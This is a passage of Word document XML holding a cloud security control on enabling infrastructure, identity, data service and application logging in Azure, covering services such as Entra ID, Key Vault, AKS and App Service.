    <w:p w14:paraId="59FAF9D0" w14:textId="5A9CD3A7" w:rsidR="004C696D" w:rsidRDefault="004C696D" w:rsidP="004C696D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>LT-3.1: Enable infrastructure and identity logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735E5D20" w14:textId="0A0CBF3F" w:rsidR="004C696D" w:rsidRDefault="004C696D" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:t>Establish the foundational audit trail by capturing all management plane operations and identity events across your cloud environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AB61AC" w14:textId="4902DC95" w:rsidR="004C696D" w:rsidRDefault="004C696D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:t>Enable activity logs for management plane operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CACB56" w14:textId="246F0694" w:rsidR="004C696D" w:rsidRDefault="004C696D" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:t>Activate Azure Activity Logs for all subscriptions to capture management plane operations including resource creation, modification, deletion (PUT, POST, DELETE operations), role assignments, policy changes, and administrative actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DAEB81" w14:textId="791F06B5" w:rsidR="004C696D" w:rsidRDefault="004C696D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:t>Centralize activity log collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F498A4" w14:textId="2A7F4252" w:rsidR="004C696D" w:rsidRDefault="004C696D" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:t>Configure diagnostic settings at the management group or subscription level to route Activity Logs to centralized Log Analytics workspace for long-term retention, correlation analysis, and compliance reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76EE2C" w14:textId="24734A65" w:rsidR="004C696D" w:rsidRDefault="004C696D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:t>Enforce consistent logging coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76C023" w14:textId="1105503D" w:rsidR="004C696D" w:rsidRDefault="004C696D" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:t>Deploy Azure Policy to enforce diagnostic settings across all subscriptions ensuring consistent Activity Log collection and preventing configuration drift as new subscriptions are created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C19AD5" w14:textId="6C231907" w:rsidR="004C696D" w:rsidRDefault="004C696D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:t>Capture authentication events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF30672" w14:textId="051FA93E" w:rsidR="004C696D" w:rsidRDefault="004C696D" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004C696D">
        <w:lastRenderedPageBreak/>
        <w:t>Enable Microsoft Entra sign-in logs to capture all user and service principal authentication events including interactive sign-ins, non-interactive sign-ins, service principal sign-ins, and managed identity authentications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A36A2A" w14:textId="5D747124" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Track identity changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5064DF6F" w14:textId="5140E68A" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Enable Microsoft Entra audit logs to track all changes made to Microsoft Entra ID including user/group management, role assignments, application registrations, conditional access policy modifications, and administrative unit changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423DAB55" w14:textId="4FA9DDC0" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Extend identity log retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF67F70" w14:textId="0BF1727E" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Configure Microsoft Entra diagnostic settings to route sign-in and audit logs to Log Analytics workspace or Event Hub for extended retention beyond the default 30-day Microsoft Entra admin center retention period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56026511" w14:textId="2B33E748" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Monitor hybrid identity infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06643692" w14:textId="4FF3B634" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>For hybrid environments, integrate Microsoft Entra Connect Health logs to monitor synchronization events, authentication failures, and on-premises Active Directory integration health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00002E60" w14:textId="1C7C7927" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Correlate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve"> with network events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E122EE7" w14:textId="5A91D987" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Enable network infrastructure logs as covered in LT-4 (NSG flow logs, Azure Firewall logs, VPN Gateway diagnostics, Application Gateway logs) to provide network context for security investigations correlating identity and control plane events with network traffic patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5984FCA7" w14:textId="35689F12" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>LT-3.2: Enable platform and data service logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C6A84C" w14:textId="689E339E" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Extend audit coverage to data plane operations where sensitive business data resides and is accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64809AF2" w14:textId="0FC5E324" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Enable resource-level data plane logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767200D1" w14:textId="23411D89" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Activate Azure resource logs for data plane operations performed within Azure services including read, write, and delete operations on data and configurations across all platform services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C44CA96" w14:textId="4AD10FBC" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Log storage operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55407A77" w14:textId="50D8F0DB" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve">Enable Azure Storage diagnostic logs to capture all blob, file, queue, and table storage operations including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>StorageRead</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>StorageWrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>StorageDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve"> events with caller identity, source IP, and operation latency for forensic investigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7463B" w14:textId="4E147DC6" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Audit database activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A6EF9" w14:textId="6CB3F7FF" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Configure Azure SQL Database auditing to log all database queries, schema changes, permission grants, authentication attempts, and administrative operations—route audit logs to Log Analytics workspace or storage account for compliance and security monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C314E" w14:textId="63CE8726" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:lastRenderedPageBreak/>
        <w:t>Monitor secrets access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B562D1" w14:textId="38C3AEE6" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Enable Azure Key Vault diagnostic logs to capture all key, secret, and certificate access operations including retrieval, rotation, deletion, and permission changes with full audit context for sensitive asset tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CB96C5" w14:textId="11C2092C" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Track NoSQL operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC3511" w14:textId="70121934" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Configure Azure Cosmos DB diagnostic logs to capture data plane operations, query performance, partition key access patterns, and throttling events for security and performance investigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E17EB8" w14:textId="1535E0B1" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Cover</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve"> additional data platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD79E95" w14:textId="723A6790" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Enable diagnostic logging for other data services including Azure Data Lake Storage, Azure Synapse Analytics, Azure Database for PostgreSQL/MySQL, and Azure Cache for Redis capturing data access and administrative operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0B0AC" w14:textId="702DDC39" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Log Kubernetes control plane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3537D9A2" w14:textId="61BA3AF4" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve">Enable Azure Kubernetes Service (AKS) diagnostics to capture control plane logs including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>kube-apiserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve"> (all API requests), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>kube</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve">-audit (security audit trail), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>kube</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve">-controller-manager, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>kube</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>-scheduler, and cluster-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>autoscaler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF4E74">
        <w:t xml:space="preserve"> logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55222F71" w14:textId="06AD97EA" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Monitor container runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F9483" w14:textId="435B326A" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Configure Container Insights to collect container-level metrics, logs, and performance data from AKS clusters, Azure Container Instances, and Azure Arc-enabled Kubernetes clusters including pod lifecycle events and resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C3FD5" w14:textId="2F0769EE" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Track container images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697ED979" w14:textId="6FC4BD84" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Enable Azure Container Registry diagnostics to log image push/pull operations, repository access, authentication events, webhook invocations, and vulnerability scan results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5614AFA4" w14:textId="15F5D958" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Automate platform logging enablement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284D2CC" w14:textId="08E0B842" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Use Microsoft Defender for Cloud to automatically enable and configure resource logs for supported Azure services across subscriptions reducing manual configuration overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8A6FF" w14:textId="1A6E6F1B" w:rsidR="00FF4E74" w:rsidRDefault="00FF4E74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Enforce consistent coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F3BA4" w14:textId="470D2204" w:rsidR="00FF4E74" w:rsidRPr="00FF4E74" w:rsidRDefault="00FF4E74" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4E74">
        <w:t>Deploy Azure Policy to enforce diagnostic settings for data services ensuring consistent log collection, preventing configuration drift, and remediating non-compliant resources automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18789F52" w14:textId="77777777" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00D32901"/>
    <w:p w14:paraId="0CAB8F92" w14:textId="77777777" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00D32901"/>
    <w:p w14:paraId="649E283F" w14:textId="77777777" w:rsidR="00D32901" w:rsidRDefault="00D32901" w:rsidP="00D32901"/>
    <w:p w14:paraId="61C008C9" w14:textId="01E03FE6" w:rsidR="00554D34" w:rsidRDefault="00554D34" w:rsidP="00554D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00554D34">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LT-3.3: Enable application and workload logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A6C6E" w14:textId="0DC49B0A" w:rsidR="00554D34" w:rsidRDefault="00554D34" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00554D34">
        <w:t>Complete your audit coverage by capturing application-layer activities, custom workload operations, and business logic execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB9A18" w14:textId="5DC6B307" w:rsidR="00554D34" w:rsidRDefault="00554D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00554D34">
        <w:t>Log web application activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A28F24" w14:textId="77ED67C4" w:rsidR="00835190" w:rsidRDefault="00554D34" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00554D34">
        <w:t>Enable Azure App Service diagnostics to capture application logs, web server logs (IIS/HTTP.sys logs), detailed error messages, failed request tracing, and deployment logs for web applications and APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7988A1BB" w14:textId="4597EE82" w:rsidR="00554D34" w:rsidRDefault="00554D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00554D34">
        <w:t>Monitor API gateway operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E96E2" w14:textId="73849CF0" w:rsidR="00835190" w:rsidRDefault="00835190" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00835190">
        <w:t>Configure Azure API Management diagnostics to log API requests, responses, authentication failures, rate limit violations, policy execution details, backend service errors, and subscription management events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B61004" w14:textId="4E7B0F8A" w:rsidR="00CC25E5" w:rsidRDefault="00CC25E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC25E5">
        <w:t>Track serverless function execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8343F7" w14:textId="3B666A11" w:rsidR="00CC25E5" w:rsidRDefault="00CC25E5" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC25E5">
        <w:t>Enable Azure Functions monitoring with Application Insights integration to capture function executions, dependencies, exceptions, performance metrics, and custom security events including authorization decisions and sensitive operation audits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F212B5E" w14:textId="20A17A3E" w:rsidR="00CC25E5" w:rsidRDefault="00CC25E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC25E5">
        <w:t>Log business process workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1502BA5C" w14:textId="1B297D34" w:rsidR="00CC25E5" w:rsidRDefault="00CC25E5" w:rsidP="001236AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC25E5">
        <w:t>For Azure Logic Apps, enable diagnostics to log workflow runs, trigger events, action results, and integration failures supporting business process security investigations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC66014" w14:textId="6DF4839B" w:rsidR="00846148" w:rsidRDefault="00846148">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00846148">
        <w:t>Deploy VM monitoring agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4A1A5" w14:textId="3EBDAE0C" w:rsidR="00846148" w:rsidRDefault="00846148" w:rsidP="00001F1F">
      <w:pPr>
